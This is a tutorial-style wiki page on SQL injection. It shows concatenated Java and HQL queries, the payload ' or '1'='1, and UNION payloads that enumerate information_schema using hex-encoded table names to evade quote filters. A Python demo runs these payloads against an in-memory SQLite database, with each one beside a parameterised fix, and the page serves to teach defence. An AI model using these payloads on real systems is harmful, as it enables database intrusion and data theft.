====== SQL Injection - Example attacks ======

  * [[SQL Injection - Example attacks:Basic SQL Injection attack|Basic SQL Injection attack]]
  * [[SQL Injection - Example attacks:Basic SQL Injection attack with defence|Basic SQL Injection attack with defence]]
  * [[SQL Injection - Example attacks:Incorrect type handling|Incorrect type handling]]
  * [[SQL Injection - Example attacks:Incorrectly filtered escape characters|Incorrectly filtered escape characters]]
  * [[SQL Injection - Example attacks:SQL Injection attack against PHP addslashes|SQL Injection attack against PHP addslashes]]
  * [[SQL Injection - Example attacks:SQL injection that gets around mysql_real_escape_string()|SQL injection that gets around mysql_real_escape_string()]]

===== Example attacks =====

**Scenario #1**: The application uses untrusted data in the construction of the following vulnerable SQL call:

<code java>
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
</code>

**Scenario #2**: Similarly, an application's blind trust in frameworks may result in queries that are still vulnerable, e.g. Hibernate Query Language (HQL). HQL is not SQL, but it is parsed into SQL, and string concatenation injects into it in exactly the same way:

<code java>
Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'");
</code>

In both cases, the attacker modifies the ''id'' parameter value in the browser to send:

  ' or '1'='1

For example:

  http://example.com/app/accountView?id=' or '1'='1

The leading quote closes the string literal that was opened around the parameter, and the trailing ''%%'1'='1%%'' is completed by the quote the application appends, so both queries now read ''%%WHERE custID='' or '1'='1'%%'' and return every record from the accounts table. More dangerous attacks could modify data or even invoke stored procedures. The fix in both cases is the same: pass ''id'' as a bound parameter (''PreparedStatement'' / ''setParameter'') instead of concatenating it into the query text.

===== Other attacks =====

Where the parameter is used in a numeric context (''SELECT ... WHERE id = <input>''), no quote needs closing. Passing the following as input appends a second result set listing every table the database user can see (MySQL; other engines expose the same data under other names):

  -1 union all select table_name from information_schema.tables

With a table name in hand, the same technique extracts that table's structure. The table name is supplied as a hex literal (''0x61727469636c65'' is the string ''article'' in MySQL) so that the payload contains no quote characters for a filter to strip or escape:

  SELECT ... WHERE id = -1 union all select column_name from information_schema.columns where table_name = 0x61727469636c65

The ''-1'' matches no real row, so only the injected rows come back. Note that the injected ''select'' must return the same number of columns as the original query, or the ''union'' is rejected; an attacker typically pads it with ''null'' or numeric literals until the column count matches.

===== References =====

  * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
  * http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
  * https://en.wikipedia.org/wiki/SQL_injection
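The two attacks on this page, the quoted-string injection of Scenario #1 and the numeric-context ''union'' enumeration from "Other attacks", as an added worked example that is not code from the original page. It runs against an in-memory SQLite database with a constructed ''accounts'' and ''article'' table; ''sqlite_master'' stands in for MySQL's ''information_schema.tables'' (SQLite has no ''information_schema''), and the injected ''select'' is widened to three columns so that it unions cleanly with the application's query. Each vulnerable lookup is shown beside its parameterised counterpart, so the same payload can be seen to succeed against one and fail against the other.

```python
import sqlite3

# Constructed sample schema and rows (not from the original page). The
# accounts table mirrors the one in Scenario #1/#2; article is the table
# whose name is hex-encoded in the information_schema payload above.
SCHEMA = """
CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER);
INSERT INTO accounts VALUES ('1001', 'alice', 500);
INSERT INTO accounts VALUES ('1002', 'bob', 1200);
INSERT INTO accounts VALUES ('1003', 'carol', 75);
CREATE TABLE article (id INTEGER, title TEXT, body TEXT);
INSERT INTO article VALUES (1, 'hello', 'world');
"""

# PAYLOAD_QUOTED is the page's own attack string. PAYLOAD_UNION is the page's
# union attack adapted to SQLite: sqlite_master replaces information_schema
# .tables, and three columns are selected to match the application's query.
PAYLOAD_QUOTED = "' or '1'='1"
PAYLOAD_UNION = ("-1 union all select name, type, sql from sqlite_master "
                 "where type='table'")


def new_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def account_view_vulnerable(conn, user_id):
    """Scenario #1 as written: the id parameter is concatenated into the SQL."""
    query = ("SELECT custID, owner, balance FROM accounts WHERE custID='"
             + user_id + "'")
    return conn.execute(query).fetchall()


def account_view_safe(conn, user_id):
    """Same lookup with a bound parameter: the input can never become SQL."""
    query = "SELECT custID, owner, balance FROM accounts WHERE custID=?"
    return conn.execute(query, (user_id,)).fetchall()


def article_view_vulnerable(conn, article_id):
    """Numeric context from 'Other attacks': no quote to close, -1 matches
    nothing, so only the unioned sqlite_master rows come back."""
    query = "SELECT id, title, body FROM article WHERE id = " + article_id
    return conn.execute(query).fetchall()


def article_view_safe(conn, article_id):
    """Type check plus bound parameter; a payload is rejected before any SQL
    is built, and even a numeric-looking one is bound as a value, not text."""
    try:
        n = int(article_id)
    except ValueError:
        return []
    query = "SELECT id, title, body FROM article WHERE id = ?"
    return conn.execute(query, (n,)).fetchall()


if __name__ == "__main__":
    db = new_db()
    print("vulnerable, normal input:", account_view_vulnerable(db, "1001"))
    print("vulnerable, injected:    ", account_view_vulnerable(db, PAYLOAD_QUOTED))
    print("safe, injected:          ", account_view_safe(db, PAYLOAD_QUOTED))
    print("vulnerable union:        ", article_view_vulnerable(db, PAYLOAD_UNION))
    print("safe union:              ", article_view_safe(db, PAYLOAD_UNION))
```

Running the script prints one row for the honest lookup, all three account rows for the injected one, an empty list for the parameterised lookup with the same payload, and, for the union payload, the name, type and ''CREATE TABLE'' text of every table in the database (which is the SQLite equivalent of reading ''table_name'' and then ''column_name'' out of ''information_schema''). On MySQL the only change needed in the vulnerable functions would be the payload; the safe functions need no change at all, which is the point of binding parameters.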